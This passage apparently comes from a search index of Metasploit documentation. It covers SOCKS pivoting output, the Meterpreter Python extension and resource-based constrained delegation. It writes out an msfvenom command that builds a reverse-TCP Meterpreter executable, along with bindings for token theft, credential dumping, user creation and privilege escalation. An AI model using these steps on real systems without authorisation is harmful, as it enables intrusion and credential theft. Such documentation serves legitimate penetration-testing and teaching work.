OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:7458 &amp;lt;--socket error or timeout! [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:42597 &amp;lt;--socket error or timeout! [proxychains] Strict chain ... 
127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:1433 &amp;lt;--socket error or timeout! [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 169.254.37.128:445 ... OK Nmap scan report for 169.254.37.128 Host is up (0.14s latency). PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? Host script results: |_clock-skew: -1s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-04-08T19:09:38 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 83.03 seconds . ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#socks-module",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#socks-module"
  },"733": {
    "doc": "Pivoting in Metasploit",
    "title": "Pivoting in Metasploit",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html",
    "relUrl": "/docs/using-metasploit/intermediate/pivoting-in-metasploit.html"
  },"734": {
    "doc": "Powershell Extension",
    "title": "Powershell Extension",
    "content": "I’m yet to get the documentation done for this extension, but in the mean time there’s some useful information in the original payloads pull request that shows how it can be used (including bindings). I promise to get more detail here soon! . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/powershell-extension.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/powershell-extension.html"
  },"735": {
    "doc": "Python Extension",
    "title": "Introduction",
    "content": "For quite some time, Meterpreter users have wanted the ability to run arbitrary scripts under the context of a session on the target machine. While Railgun gives coders the ability to execute arbitrary Win32 API calls, it doesn’t really give them the ability to script the client in a single-shot. Meterpreter now has a new extension that aims to solve this problem by providing a completely in-memory Python interpreter that can load scripts, run ad-hoc python commands, and also provides bindings to Meterpreter itself. The extension comes with many (but not all) of the built-in functionality you would expect to see in a running Python interpreter. This includes the likes of ctypes for easy automation of Win32-related functions. We’ve even taken steps to make this extension piggy-back onto metsrv’s copy of the SSL libraries in an effort to reduce the size of the resulting binary. This page aims to document the features, show examples of how it can be used, and answer a few common questions that come up. Unfortunately, at this point in time the extension only works inside x86 and x64 Meterpreters running on Windows targets. However, there are plans to enable this functionality on other implementations over time. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#introduction",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#introduction"
  },"736": {
    "doc": "Python Extension",
    "title": "Usage",
    "content": "As with any other extension that comes with Meterpreter, loading it is very simple: . meterpreter &amp;gt; use python Loading extension python...success. Once loaded, the help system shows the commands that come with the extension: . meterpreter &amp;gt; help ... snip ... Python Commands =============== Command Description ------- ----------- python_execute Execute a python command string python_import Import/run a python file or module python_reset Resets/restarts the Python interpreter . Each of these commands is discussed in detail below. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#usage",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#usage"
  },"737": {
    "doc": "Python Extension",
    "title": "python_execute",
    "content": "The python_execute command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the -c switch. The full help for the command is as follows: . meterpreter &amp;gt; python_execute -h Usage: python_execute &amp;lt;python code&amp;gt; [-r result var name] Runs the given python string on the target. If a result is required, it should be stored in a python variable, and that variable should passed using the -r parameter. OPTIONS: -h Help banner -r &amp;lt;opt&amp;gt; Name of the variable containing the result (optional) . A very simple example of this command is shown below: . meterpreter &amp;gt; python_execute \"print 'Hi, from Meterpreter!'\" [+] Content written to stdout: Hi, from Meterpreter! . Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it’s visible to the user. This also happens for anything written to stderr, as shown below: . meterpreter &amp;gt; python_execute \"x = x + 1\" [-] Content written to stderr: Traceback (most recent call last): File \"&amp;lt;string&amp;gt;\", line 1, in &amp;lt;module&amp;gt; NameError: name 'x' is not defined . This handy feature not only allows users to see the output of their scripts, but it also means that any errors are completely visible too. A more interesting example can be seen below: . meterpreter &amp;gt; python_execute \"x = [y for y in range(0, 20) if y % 5 == 0]\" [+] Command executed without returning a result . The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured. The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, x is still present in the interpreter and can be accessed with another call: . 
meterpreter &amp;gt; python_execute \"print x\" [+] Content written to stdout: [0, 5, 10, 15] . As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the -r parameter, as described by the help: . meterpreter &amp;gt; python_execute \"x = [y for y in range(0, 20) if y % 5 == 0]\" -r x [+] x = [0, 5, 10, 15] . Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the -r parameter: . meterpreter &amp;gt; python_execute \"\" -r x [+] x = [0, 5, 10, 15] . Behind the scenes, the result of the execution is a Ruby hash that contains all content written to stdout and stderr, and the content of the variable chosen using the -r parameter. Sometimes, single-line execution isn’t enough, or is cumbersome. The python_import command is provided to solve this problem and allow for scripts and modules to be loaded into the target from disk. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_execute",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_execute"
  },"738": {
    "doc": "Python Extension",
    "title": "python_import",
    "content": "This command allows for whole modules to be loaded from the attacker’s machine and uploaded to the target interpreter. The full help is shown below: . meterpreter &amp;gt; python_import -h Usage: python_import &amp;lt;-f file path&amp;gt; [-n mod name] [-r result var name] Loads a python code file or module from disk into memory on the target. The module loader requires a path to a folder that contains the module, and the folder name will be used as the module name. Only .py files will work with modules. OPTIONS: -f &amp;lt;opt&amp;gt; Path to the file (.py, .pyc), or module directory to import -h Help banner -n &amp;lt;opt&amp;gt; Name of the module (optional, for single files only) -r &amp;lt;opt&amp;gt; Name of the variable containing the result (optional, single files only) . Importing of module trees is still considered a beta feature, but we encourage you to use it where possible and keep us informed of any issues you may face. Consider the following script: . # $ cat /tmp/drives.py import string from ctypes import windll def get_drives(): drives = [] bitmask = windll.kernel32.GetLogicalDrives() for letter in string.uppercase: if bitmask &amp;amp; 1: drives.append(letter) bitmask &amp;gt;&amp;gt;= 1 return drives result = get_drives() print result . The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows: . meterpreter &amp;gt; python_import -f /tmp/drives.py [*] Importing /tmp/drives.py ... [+] Content written to stdout: ['A', 'C', 'D', 'Z'] . This shows that ctypes does indeed function correctly! . This command is also intended to allow for recursive loading of modules from the local attacker file system; however, this feature is still not yet ready for prime time and work is still actively being done on this area. 
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_import",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_import"
  },"739": {
    "doc": "Python Extension",
    "title": "python_reset",
    "content": "It may get to a point where the content of the interpreter needs to be flushed. The python_reset command clears out all imports, libraries and global variables: . meterpreter &amp;gt; python_execute \"x = 100\" [+] Command executed without returning a result meterpreter &amp;gt; python_execute \"print x\" [+] Content written to stdout: 100 meterpreter &amp;gt; python_reset [+] Python interpreter successfully reset meterpreter &amp;gt; python_execute \"print x\" [-] Content written to stderr: Traceback (most recent call last): File \"&amp;lt;string&amp;gt;\", line 1, in &amp;lt;module&amp;gt; NameError: name 'x' is not defined . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_reset",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#python_reset"
  },"740": {
    "doc": "Python Extension",
    "title": "Meterpreter Bindings",
    "content": "A number of bindings are available to the Python extension that allow for interaction with the Meterpreter instance itself. They are broken up into logical modules based on the functionality that they provide. Bindings are available for other extensions as well, and hence in order to use them, those extensions must be loaded. If an extension is not present, an error is thrown. As soon as an extension is loaded, the function should work. Each of the following subsections shows a module namespace that must be imported for that module to function correctly. Binding list . meterpreter.elevate . | meterpreter.elevate.getsystem() - maps directly to the getsystem command, however only attempts to use technique 1 because this is the only technique that doesn’t require a binary to be uploaded. | meterpreter.elevate.rev2self() - maps directly to the rev2self command. | meterpreter.elevate.steal_token(pid) - provides the ability to steal a token from another process. | pid - the identifier of the process to steal the token from. | . | meterpreter.elevate.drop_token() - drops the token that was stolen using steal_token. | . meterpreter.extapi (requires the extapi extension) . Each of the following functions takes the following parameters: . | domain_name - the name of the domain that will be enumerated. | max_results - maximum number of results (default None). | page_size - the size of the results page (default None). | . The full list of available functions is as follows: . | meterpreter.extapi.adsi.enum_dcs(domain_name, max_results, page_size) - enumerate the domain controllers on the given domain. | meterpreter.extapi.adsi.enum_users(domain_name, max_results, page_size) - enumerate users on the given domain. | meterpreter.extapi.adsi.enum_group_users_nested(domain_name, group_dn, max_results, page_size) - enumerate users in the given group recursively. | group_dn - The distinguished name of the group to enumerate. | . 
| meterpreter.extapi.adsi.enum_computers(domain_name, max_results, page_size) - enumerate computers on the given domain. | meterpreter.extapi.adsi.domain_query(domain_name, query_filter, fields, max_results, page_size) - provides a generic query mechanism to ADSI. All other functions in this library make use of this function. | query_filter - the LDAP-formatted query filter for the query. | fields - list of fields to extract from the query results. | . | . meterpreter.fs . | meterpreter.fs.show_mount() - maps to the show_mount command and lists all logical drives on the target. | . meterpreter.incognito (requires the incognito extension) . | meterpreter.incognito.list_user_tokens() - list all available user tokens. | meterpreter.incognito.list_group_tokens() - list all available group tokens. | meterpreter.incognito.impersonate(user) - impersonate the given user. | user - name of the user/group to impersonate in DOMAIN\\user format. | . | meterpreter.incognito.snarf_hashes(server) - run the snarf_hashes functionality using the specified server. | server - name of the server that is in place and ready to snarf the hashes. | . | meterpreter.incognito.add_user(server, username, password) - add a user to the given server. | server - name of the server to use when adding the user. | username - name of the user to create. | password - password for the new user. | . | meterpreter.incognito.add_group_user(server, group, username) - add a user to a group (domain). | server - name of the server to use when adding the user to a group. | group - name of the group to add the user to. | username - name of the user to add to the group. | . | meterpreter.incognito.add_localgroup_user(server, group, username) - add a user to a group (local). | server - name of the server to use when adding the user to a group. | group - name of the group to add the user to. | username - name of the user to add to the group. | . | . meterpreter.kiwi (requires the kiwi extension) . 
| meterpreter.kiwi.creds_all() - matches the creds_all command from the kiwi extension and returns a full list of all credentials that can be pulled from memory. | . meterpreter.sys . | meterpreter.sys.info() - matches the sysinfo command and shows system information. | meterpreter.sys.ps_list() - matches the ps command and lists the processes on the target. | . meterpreter.transport . | meterpreter.transport.list() - list all transports in the target. | meterpreter.transport.add(url, session_expiry, comm_timeout, retry_total, retry_wait, ua, proxy_host, proxy_user, proxy_pass, cert_hash) - allows for transports to be added to the Meterpreter session. All but the url parameter come with a sane default. Full details of each of these parameters can be found in the transport documentation. | . It is not possible to delete transports using the python extension as this opens the door to many kinds of failure. meterpreter.user . | meterpreter.user.getuid() - gets the UID of the current session. | meterpreter.user.getsid() - gets the SID of the current session. | meterpreter.user.is_system() - determines if the current session is running as the SYSTEM user. | . Bindings example . meterpreter &amp;gt; getuid Server username: WIN-TV01I7GG7JK\\oj meterpreter &amp;gt; python_execute \"import meterpreter.user; print meterpreter.user.getuid()\" [+] Content written to stdout: WIN-TV01I7GG7JK\\oj meterpreter &amp;gt; python_execute \"import meterpreter.elevate; meterpreter.elevate.getsystem()\" [+] Command executed without returning a result meterpreter &amp;gt; getuid Server username: NT AUTHORITY\\SYSTEM meterpreter &amp;gt; python_execute \"meterpreter.elevate.rev2self(); print meterpreter.user.getuid()\" [+] Content written to stdout: WIN-TV01I7GG7JK\\oj meterpreter &amp;gt; use incognito Loading extension incognito...success. 
meterpreter &amp;gt; python_execute \"import meterpreter.incognito; print meterpreter.incognito.list_user_tokens()\" [+] Content written to stdout: {'Delegation': ['NT AUTHORITY\\\\LOCAL SERVICE', 'NT AUTHORITY\\\\NETWORK SERVICE', 'NT AUTHORITY\\\\SYSTEM', 'WIN-TV01I7GG7JK\\\\oj'], 'Impersonation': ['NT AUTHORITY\\\\ANONYMOUS LOGON']} meterpreter &amp;gt; python_execute \"import meterpreter.fs; print meterpreter.fs.show_mount()\" [+] Content written to stdout: [{'Name': 'A:\\\\', 'SpaceUser': None, 'SpaceTotal': None, 'UNC': None, 'SpaceFree': None, 'Type': 2}, {'Name': 'C:\\\\', 'SpaceUser': 28950585344L, 'SpaceTotal': 64422408192L, 'UNC': None, 'SpaceFree': 28950585344L, 'Type': 3}, {'Name': 'D:\\\\', 'SpaceUser': None, 'SpaceTotal': None, 'UNC': None, 'SpaceFree': None, 'Type': 5}] . Each of the examples above just show the results printed to stdout, however the values are returned as Python dictionaries and can be operated on just like normal variables. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#meterpreter-bindings",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#meterpreter-bindings"
  },"741": {
    "doc": "Python Extension",
    "title": "Stageless Initialisation",
    "content": "Not only can the extension be baked into a stageless Meterpreter, like any other extension, it also has the ability to run an arbitrary script before the Meterpreter session is even established! Consider the following script: . $ cat /tmp/met.py import meterpreter.transport meterpreter.transport.add(\"tcp://127.0.0.1:8000\") . This is a simple script that uses the Meterpreter bindings to add a new transport to the list of transports. This is executed immediately before Meterpreter attempts to create a connection back to Metasploit for the first time. The intent is to show that it’s possible to add any number of transports on startup. To create a stageless payload that uses this script, we can make use of the EXTINIT parameter in msfvenom: . $ msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.16.52.1 LPORT=4445 EXTENSIONS=stdapi,priv,python EXTINIT=python,/tmp/met.py -f exe -o /tmp/met-stageless.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 6412437 bytes Saved as: /tmp/met-stageless.exe . When this payload is executed, the transport is added and shown to be present in the transport list immediately: . msf exploit(handler) &amp;gt; [*] Meterpreter session 2 opened (172.16.52.1:4445 -&amp;gt; 172.16.52.247:49159) at 2015-12-13 11:06:54 +1000 msf exploit(handler) &amp;gt; sessions -i -1 [*] Starting interaction with 2... meterpreter &amp;gt; transport list Session Expiry : @ 2015-12-20 11:06:52 ID Curr URL Comms T/O Retry Total Retry Wait -- ---- --- --------- ----------- ---------- 1 tcp://127.0.0.1:8000 300 3600 10 2 * tcp://172.16.52.1:4445 300 3600 10 . This stageless initialisation feature allows for long-running Python scripts to be run before Meterpreter even calls home. This is really handy in so many ways, so get creative and show us how awesome this can be. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#stageless-initialisation",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#stageless-initialisation"
  },"742": {
    "doc": "Python Extension",
    "title": "FAQ",
    "content": "Does the extension do dynamic resolution of Python libraries at runtime? . Yes. The extension has a built-in import handler that loads modules from memory. This includes modules that the user has dynamically loaded using the python_import command. If a module doesn’t exist as part of the extension then resolution will fail. Down the track we may look into extending this feature so that missing libraries are uploaded on-the-fly when an import fails, but it’s not known when this work will get done. When will this extension be available for other Meterpreters? . We’re not yet able to put a timeline on this. Is it possible to use the Python extension to run Responder? . Unfortunately, no it is not. Responder makes the assumption that port 445 is available for use on the target, which is why it functions nicely on *nix systems that don’t make use of this port by default. On Windows systems, port 445 is already in use by system services and hence can’t be bound to. There is a PowerShell-based project that aims to do the same thing as Responder, and that is called Inveigh. This utility piggy-backs off the existing SMB service, and appears to do quite a good job of stealing hashes, so it’s recommended that this be used instead. Is it perfect? . Hell no! But the goal is to get closer and closer to perfect as we go. It’s up to you to help us improve it along the way by using it in interesting ways, and submitting bugs when it breaks. Can I suggest a feature? . Please do, making good use of the Github issues feature. Better still, create a PR for one! . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#faq",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#faq"
  },"743": {
    "doc": "Python Extension",
    "title": "Currently Loadable Native Libraries",
    "content": "__future__ __phello__ _abcoll _osx_support _pyio _strptime _threading_local _weakrefset abc aifc antigravity argparse asynchat asyncore atexit audiodev base64 BaseHTTPServer Bastion bdb binhex bisect calendar cgi CGIHTTPServer cgitb chunk cmd code codecs codeop collections colorsys commands compileall compiler compiler.ast compiler.consts compiler.future compiler.misc compiler.pyassem compiler.pycodegen compiler.symbols compiler.syntax compiler.transformer compiler.visitor ConfigParser contextlib Cookie cookielib copy copy_reg cProfile csv ctypes ctypes._endian ctypes.util ctypes.wintypes decimal difflib dircache dis DocXMLRPCServer dummy_thread dummy_threading email email._parseaddr email.base64mime email.charset email.encoders email.errors email.feedparser email.generator email.header email.iterators email.message email.parser email.quoprimime email.utils email.mime email.mime.application email.mime.audio email.mime.base email.mime.image email.mime.message email.mime.multipart email.mime.nonmultipart email.mime.text encodings encodings.aliases encodings.ascii encodings.base64_codec encodings.charmap encodings.cp037 encodings.cp1006 encodings.cp1026 encodings.cp1140 encodings.cp1250 encodings.cp1251 encodings.cp1252 encodings.cp1253 encodings.cp1254 encodings.cp1255 encodings.cp1256 encodings.cp1257 encodings.cp1258 encodings.cp424 encodings.cp437 encodings.cp500 encodings.cp720 encodings.cp737 encodings.cp775 encodings.cp850 encodings.cp852 encodings.cp855 encodings.cp856 encodings.cp857 encodings.cp858 encodings.cp860 encodings.cp861 encodings.cp862 encodings.cp863 encodings.cp864 encodings.cp865 encodings.cp866 encodings.cp869 encodings.cp874 encodings.cp875 encodings.hex_codec encodings.hp_roman8 encodings.idna encodings.iso8859_1 encodings.iso8859_10 encodings.iso8859_11 encodings.iso8859_13 encodings.iso8859_14 encodings.iso8859_15 encodings.iso8859_16 encodings.iso8859_2 encodings.iso8859_3 encodings.iso8859_4 encodings.iso8859_5 
encodings.iso8859_6 encodings.iso8859_7 encodings.iso8859_8 encodings.iso8859_9 encodings.koi8_r encodings.koi8_u encodings.latin_1 encodings.mac_arabic encodings.mac_centeuro encodings.mac_croatian encodings.mac_cyrillic encodings.mac_farsi encodings.mac_greek encodings.mac_iceland encodings.mac_latin2 encodings.mac_roman encodings.mac_romanian encodings.mac_turkish encodings.mbcs encodings.palmos encodings.ptcp154 encodings.punycode encodings.quopri_codec encodings.raw_unicode_escape encodings.rot_13 encodings.string_escape encodings.tis_620 encodings.undefined encodings.unicode_escape encodings.unicode_internal encodings.utf_16 encodings.utf_16_be encodings.utf_16_le encodings.utf_32 encodings.utf_32_be encodings.utf_32_le encodings.utf_7 encodings.utf_8 encodings.utf_8_sig encodings.uu_codec encodings.zlib_codec filecmp fileinput fnmatch formatter fpformat fractions ftplib functools genericpath getopt getpass gettext glob gzip hashlib heapq hmac htmlentitydefs htmllib HTMLParser httplib ihooks imaplib imghdr importlib imputil inspect io json json.decoder json.encoder json.scanner json.tool keyword linecache locale logging logging.config logging.handlers macpath macurl2path mailbox mailcap markupbase md5 meterpreter meterpreter.core meterpreter.elevate meterpreter.fs meterpreter.incognito meterpreter.kiwi meterpreter.sys meterpreter.tlv meterpreter.transport meterpreter.user meterpreter.extapi meterpreter.extapi.adsi mhlib mimetools mimetypes MimeWriter modulefinder multifile multiprocessing multiprocessing.connection multiprocessing.forking multiprocessing.heap multiprocessing.managers multiprocessing.pool multiprocessing.process multiprocessing.queues multiprocessing.reduction multiprocessing.sharedctypes multiprocessing.synchronize multiprocessing.util multiprocessing.dummy multiprocessing.dummy.connection mutex netrc new nntplib ntpath nturl2path numbers opcode optparse os os2emxpath pdb pickle pickletools pipes pkgutil platform plistlib popen2 poplib 
posixfile posixpath pprint profile pstats py_compile pyclbr pydoc Queue quopri random re repr rexec rfc822 rlcompleter robotparser runpy sched sets sgmllib sha shelve shlex shutil SimpleHTTPServer SimpleXMLRPCServer site smtplib sndhdr socket SocketServer sre sre_compile sre_constants sre_parse ssl stat statvfs string StringIO stringold stringprep struct subprocess sunau sunaudio symbol symtable sysconfig tabnanny tarfile telnetlib tempfile textwrap this threading timeit toaiff token tokenize trace traceback types urllib urllib2 urlparse user UserDict UserList UserString uu uuid warnings wave weakref webbrowser whichdb wsgiref wsgiref.handlers wsgiref.headers wsgiref.simple_server wsgiref.util wsgiref.validate xdrlib xml xml.dom xml.dom.domreg xml.dom.expatbuilder xml.dom.minicompat xml.dom.minidom xml.dom.NodeFilter xml.dom.pulldom xml.dom.xmlbuilder xml.etree xml.etree.ElementInclude xml.etree.ElementPath xml.etree.ElementTree xml.parsers xml.sax xml.sax._exceptions xml.sax.handler xml.sax.saxutils xml.sax.xmlreader xmllib xmlrpclib zipfile . ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#currently-loadable-native-libraries",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html#currently-loadable-native-libraries"
  },"744": {
    "doc": "Python Extension",
    "title": "Python Extension",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/meterpreter/python-extension.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/python-extension.html"
  },"745": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "RBCD Exploitation",
    "content": "If an account has the ability to write to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute against a target, i.e. having GenericWrite privileges, this can be abused for privilege escalation. The auxiliary/admin/ldap/rbcd module can be used to read and write the msDS-AllowedToActOnBehalfOfOtherIdentity LDAP attribute against a target for Resource-based Constrained Delegation (RBCD). When writing, the module will add an access control entry (ACE) to allow the account specified in DELEGATE_FROM to the object specified in DELEGATE_TO. For privilege escalation, the auxiliary/admin/kerberos/get_ticket module can then be used to request a new Kerberos S4U impersonation ticket for the Administrator account. In order for the auxiliary/admin/ldap/rbcd module to succeed, the authenticated user must have write access to the target object (the object specified in DELEGATE_TO). ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#rbcd-exploitation",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#rbcd-exploitation"
  },"746": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Lab setup",
    "content": "For the RBCD attack to work an Active Directory account (i.e. sandy) is required with write privileges to the target computer (i.e. WS01). From an admin PowerShell prompt, first create a new Active Directory account, sandy, in your Active Directory environment: . # Create a basic user account net user /add sandy Password1! # Mark the sandy account and its password as never expiring, to ensure the lab setup still works in the future net user sandy /expires:never Set-AdUser -Identity sandy -PasswordNeverExpires:$true . Grant Write privileges for sandy to the target machine, i.e. WS01: . # Remember to change WS01 to the name of your target Computer (i.e. the output of the hostname command) $TargetComputer = Get-ADComputer 'WS01' $User = Get-ADUser 'sandy' # Add GenericWrite access to the user against the target computer $Rights = [System.DirectoryServices.ActiveDirectoryRights] \"GenericWrite\" $ControlType = [System.Security.AccessControl.AccessControlType] \"Allow\" $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] \"All\" $GenericWriteAce = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $User.Sid,$Rights,$ControlType,$InheritanceType $TargetComputerAcl = Get-Acl \"AD:$($TargetComputer.DistinguishedName)\" $TargetComputerAcl.AddAccessRule($GenericWriteAce) Set-Acl -AclObject $TargetComputerAcl -Path \"AD:$($TargetComputer.DistinguishedName)\" . Finally, verify the Write privileges for the sandy account: . 
PS C:\\Users\\administrator&amp;gt; $TargetComputer = Get-ADComputer 'WS01' PS C:\\Users\\administrator&amp;gt; (Get-ACL \"AD:$($TargetComputer.DistinguishedName)\").Access| Where-Object { $_.IdentityReference -Match 'sandy' } ActiveDirectoryRights : GenericWrite InheritanceType : All ObjectType : 00000000-0000-0000-0000-000000000000 InheritedObjectType : 00000000-0000-0000-0000-000000000000 ObjectFlags : None AccessControlType : Allow IdentityReference : MSFLAB\\sandy IsInherited : False InheritanceFlags : ContainerInherit PropagationFlags : None . ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#lab-setup",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#lab-setup"
  },"747": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Module usage",
    "content": "The admin/dcerpc/samr_computer module is generally used to first create a computer account, which requires no permissions: . | From msfconsole | Do: use auxiliary/admin/dcerpc/samr_computer | Set the RHOSTS, SMBUser and SMBPass options a. For the ADD_COMPUTER action, if you don’t specify COMPUTER_NAME or COMPUTER_PASSWORD - one will be generated automatically b. For the DELETE_COMPUTER action, set the COMPUTER_NAME option c. For the LOOKUP_COMPUTER action, set the COMPUTER_NAME option | Run the module and see that a new machine account was added | . Then the auxiliary/admin/ldap/rbcd module can be used: . | Set the RHOST value to a target domain controller | Set the USERNAME and PASSWORD information to an account with the necessary privileges | Set the DELEGATE_TO and DELEGATE_FROM data store options | Use the WRITE action to configure the target for RBCD | . See the Scenarios for a more detailed walkthrough. ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#module-usage"
  },"748": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Actions",
    "content": "FLUSH . Delete the security descriptor. Unlike the REMOVE action, this deletes the entire security descriptor instead of just the matching ACEs. READ . Read the security descriptor and print the ACL contents to identify objects that are currently configured for RBCD. REMOVE . Remove matching ACEs from the security descriptor DACL. Unlike the FLUSH action, this only removes the matching ACEs instead of deleting the entire security descriptor. WRITE . Add an ACE to the security descriptor DACL to enable RBCD. The new entry will be appended to the ACL after any existing ACEs. No changes are made to the security descriptor if the ACE to enable RBCD already exists. ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#actions",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#actions"
  },"749": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Options",
    "content": "DELEGATE_TO . The delegation target. This is the object whose ACL is the target of the ACTION (read, write, etc.). The authenticated user must have write access to this object. DELEGATE_FROM . The delegation source. This is the object which is added to (if action is WRITE) or removed from (if action is REMOVE) the delegation target. ",
    "url": "/docs/pentesting/active-directory/kerberos/rbcd.html#options",
    "relUrl": "/docs/pentesting/active-directory/kerberos/rbcd.html#options"
  },"750": {
    "doc": "Resource-based constrained delegation (RBCD)",
    "title": "Scenarios",
